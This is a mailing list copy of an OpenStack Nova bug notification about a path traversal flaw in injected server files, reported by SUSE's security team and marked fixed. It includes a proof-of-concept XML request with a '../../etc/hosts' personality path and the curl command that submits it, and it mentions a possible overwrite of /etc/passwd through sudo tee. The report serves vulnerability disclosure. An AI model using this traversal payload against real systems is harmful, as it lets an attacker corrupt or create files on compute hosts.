yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1015531] Re: Remote arbitrary file corruption / creation flaw via injected files

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Sean Dague <sean@xxxxxxxxx>
Date: Mon, 15 Sep 2014 15:40:07 -0000
Reply-to: Bug 1015531 <1015531@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** No longer affects: nova/diablo

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1015531

Title:
  Remote arbitrary file corruption / creation flaw via injected files

Status in OpenStack Compute (Nova):
  Fix Released
Status in OpenStack Compute (nova) essex series:
  Fix Released
Status in “nova” package in Ubuntu:
  Fix Released
Status in “nova” source package in Precise:
  Fix Released

Bug description:
  Matthias Weckbecker from SUSE Security Team reported the following:

  ------------------
  During our internal security audit efforts at SUSE for openstack, I have found
  an issue in openstack-nova (compute).

  Quoting from [1]  (comment #1):

  Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py:
  [... snipped copy of utils.execute code ...]

  It's already doing lots of things correctly, like e.g. calling Popen with
  the first parameter being a list, still it is affected by traversal flaws.

  Testcase (also from [1], comment #0):

  mweckbecker@s3gfault:~$ cat newserver.xml
  <?xml version="1.0" encoding="UTF-8"?>
  <server xmlns="http://docs.openstack.org/compute/api/v1.1";
  imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d";
          flavorRef="6"
          name="new-server-test">
    <metadata>
      <meta key="My Server Name">foobar</meta>
    </metadata>
    <personality>
      <file path="../../../../../../../../../../../../../etc/hosts">
          ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp
          dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k
          IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs
          c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g
          QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo
          ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv
          dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy
          c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6
          b25zLiINCg0KLVJpY2hhcmQgQmFjaA==
      </file>
    </personality>
  </server>

  mweckbecker@s3gfault:~$ curl -v
  "http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers";
  -H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15"
  -H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml

  Additional note: This beast is calling tee with sudo, potentially allowing
  attackers to even alter files such as /etc/passwd.

  [1] https://bugzilla.novell.com/show_bug.cgi?id=767687

  Thanks, Matthias

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1015531/+subscriptions